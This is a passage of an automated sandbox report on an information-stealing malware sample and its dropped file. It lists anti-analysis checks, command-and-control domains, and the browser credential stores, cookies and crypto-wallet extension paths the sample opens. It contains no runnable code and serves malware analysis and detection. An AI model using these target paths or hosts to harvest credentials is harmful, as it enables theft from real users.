        Source: Mmm7GmDcR4.exe, 00000000.00000002.3769724782.000000000050C000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000002.3769263290.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000882000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000839000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3769724782.000000000050C000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.000000000050C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
        Source: Amcache.hve.7.drBinary or memory string: vmci.sys
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
        Source: 3B5A.tmp.exe, 00000003.00000003.1424191895.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
        Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
        Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
        Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
        Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
        Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
        Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_3-26161
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004402C0 LdrInitializeThunk,3_2_004402C0
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h]0_2_0042FE4F
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_005A0083 push dword ptr fs:[00000030h]0_2_005A0083
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021600B6 mov eax, dword ptr fs:[00000030h]0_2_021600B6
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0213092B mov eax, dword ptr fs:[00000030h]0_2_0213092B
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02130D90 mov eax, dword ptr fs:[00000030h]0_2_02130D90
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00540083 push dword ptr fs:[00000030h]3_2_00540083
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0076092B mov eax, dword ptr fs:[00000030h]3_2_0076092B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00760D90 mov eax, dword ptr fs:[00000030h]3_2_00760D90
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0043BBB1 GetProcessHeap,0_2_0043BBB1
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104C3
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00410656 SetUnhandledExceptionFilter,0_2_00410656
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F907
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0215A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0215A62A
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0214072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0214072A
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0213FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0213FB6E
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021408BD SetUnhandledExceptionFilter,0_2_021408BD

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: 3B5A.tmp.exeString found in binary or memory: robinsharez.shop
        Source: 3B5A.tmp.exeString found in binary or memory: handscreamny.shop
        Source: 3B5A.tmp.exeString found in binary or memory: chipdonkeruz.shop
        Source: 3B5A.tmp.exeString found in binary or memory: versersleep.shop
        Source: 3B5A.tmp.exeString found in binary or memory: crowdwarek.shop
        Source: 3B5A.tmp.exeString found in binary or memory: apporholis.shop
        Source: 3B5A.tmp.exeString found in binary or memory: femalsabler.shop
        Source: 3B5A.tmp.exeString found in binary or memory: soundtappysk.shop
        Source: 3B5A.tmp.exeString found in binary or memory: skidjazzyric.click
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeProcess created: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe "C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0041076B cpuid 0_2_0041076B
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,0_2_004351B0
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_0043B272
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_0043B2BD
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_0043B358
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3E5
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,0_2_0043B635
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B75E
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,0_2_0043B865
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B932
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_00434DBD
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043AFFA
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0216B261
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_02165024
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,0_2_02165417
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_0216B4D9
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_0216B524
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: EnumSystemLocalesW,0_2_0216B5BF
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,0_2_0216BACC
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0216BB99
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,0_2_0216B892
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,0_2_0216B89C
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0216B9C5
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103BD
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163DA
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 3B5A.tmp.exe PID: 7688, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
        Source: 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
        Source: 3B5A.tmp.exeString found in binary or memory: Jaxx Liberty
        Source: 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: 3B5A.tmp.exe, 00000003.00000003.1440192699.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3%
        Source: 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
        Source: 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
